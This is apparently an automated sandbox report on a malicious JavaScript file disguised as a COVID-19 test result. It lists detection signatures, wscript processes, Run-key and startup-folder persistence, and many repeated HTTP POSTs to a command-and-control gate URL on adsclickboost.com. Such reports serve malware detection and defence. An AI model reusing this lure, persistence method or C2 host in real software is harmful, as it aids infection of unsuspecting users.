Play interactive tour

Edit tour

Analysis Report COVID_19_Test_Result_Doctor_Note.js

Overview

General Information

Sample Name:	COVID_19_Test_Result_Doctor_Note.js
Analysis ID:	365159
MD5:	0bca3422ec870f28791d61a4fa25367f
SHA1:	36352478af11cdd59c55b8ef8ecf2cfacb2dcaaa
SHA256:	7703889f1b2c6fd8a1fe0abc4a8b6a409d4e6eabe5943c4a5261dfc68fb973f6
Infos:
Most interesting Screenshot:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Drops script at startup location

Sigma detected: Register Wscript In Run Key

System process connects to network (likely due to code injection or exploit)

Drops script or batch files to the startup folder

Found C&C like URL pattern

Potential obfuscated javascript found

Wscript called in batch mode (surpress errors)

Contains capabilities to detect virtual machines

Creates a start menu entry (Start Menu\Programs\Startup)

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Classification

Startup

System is w10x64

wscript.exe (PID: 6540 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\COVID_19_Test_Result_Doctor_Note.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 6868 cmdline: 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 5564 cmdline: 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

wscript.exe (PID: 4528 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 6540, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js

Sigma detected: Register Wscript In Run Key

Show sources

Source: Registry Key set

Author: Joe Security: Data: Details: wscript.exe //B "C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js", EventID: 13, Image: C:\Windows\System32\wscript.exe, ProcessId: 6540, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\COVID_19_Test_Result_Doctor_Note

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

Binary contains paths to debug symbols

Show sources

Source:	Binary string: scrrun.pdb source: wscript.exe, 00000001.00000002.521218312.000001F7903B0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.523143486.000001EFB7620000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.533653925.0000028338110000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502717191.00000210EA580000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdbGCTL source: wscript.exe, 00000001.00000002.518305380.000001F790330000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.508968648.000001EFB74E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522366460.00000283363E0000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502466525.00000210EA350000.00000002.00000001.sdmp
Source:	Binary string: wshom.pdbUGP source: wscript.exe, 00000001.00000002.522691276.000001F7903C0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.529022732.000001EFB8EE0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.533682314.0000028338120000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502737192.00000210EA590000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdb source: wscript.exe, 00000001.00000002.518305380.000001F790330000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.508968648.000001EFB74E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522366460.00000283363E0000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502466525.00000210EA350000.00000002.00000001.sdmp
Source:	Binary string: wshom.pdb source: wscript.exe, 00000001.00000002.522691276.000001F7903C0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.529022732.000001EFB8EE0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.533682314.0000028338120000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502737192.00000210EA590000.00000002.00000001.sdmp
Source:	Binary string: scrrun.pdbUGP source: wscript.exe, 00000001.00000002.521218312.000001F7903B0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.523143486.000001EFB7620000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.533653925.0000028338110000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502717191.00000210EA580000.00000002.00000001.sdmp

Networking:

Found C&C like URL pattern

Show sources

Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 20Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 20Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
